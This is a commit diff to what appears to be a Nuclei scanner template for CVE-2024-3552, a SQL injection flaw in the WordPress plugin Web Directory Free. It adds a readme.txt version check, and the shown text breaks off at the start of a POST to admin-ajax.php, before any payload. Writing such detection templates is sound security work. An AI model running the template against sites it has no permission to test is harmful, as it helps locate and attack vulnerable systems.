minor update
parent
9ae3565347
commit
1393afc208
|
@ -11,10 +11,26 @@ info:
|
|||
- https://vulners.com/wpvulndb/CVE-2024-3552
|
||||
- https://wpscan.com/vulnerability/34b03ee4-de81-4fec-9f3d-e1bd5b94d136/
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
publicwww-query: "/wp-content/plugins/web-directory-free"
|
||||
tags: wpscan,cve,cve2024,wordpress,wp-plugin,sqli
|
||||
tags: cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/web-directory-free/readme.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- 'Web Directory Free'
|
||||
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
|
|
Loading…
Reference in New Issue